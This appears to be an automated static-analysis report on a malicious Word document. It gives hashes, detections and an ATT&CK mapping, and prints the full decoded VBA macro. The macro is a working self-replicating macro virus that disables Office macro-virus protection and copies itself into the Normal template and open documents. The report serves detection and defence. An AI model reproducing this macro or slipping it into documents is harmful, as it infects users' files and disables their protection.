Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c576a52b64c76670…

MALICIOUS

Office (OLE)

108.5 KB Created: 2015-03-18 02:27:00 Authoring application: Microsoft Office Word First seen: 2015-09-19
MD5: 2ed79a513adbdbdbee0894ee2aab3a8a SHA-1: 9417cd12491234b276ea9799ddb0058390839850 SHA-256: c576a52b64c76670c1ac0e332623fddb98aa521f9e5483a80874c2f3bda1cced
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Word document containing VBA macros. The `Document_Open` macro is designed to disable virus protection and replicate its code to the Normal template and the active document. This self-replication behavior, along with disabling macro security, strongly suggests an attempt to maintain persistence and evade detection. No external network activity or specific exploit was identified, leading to an unknown family classification.

Heuristics 4

  • ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes
SHA-256: 9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999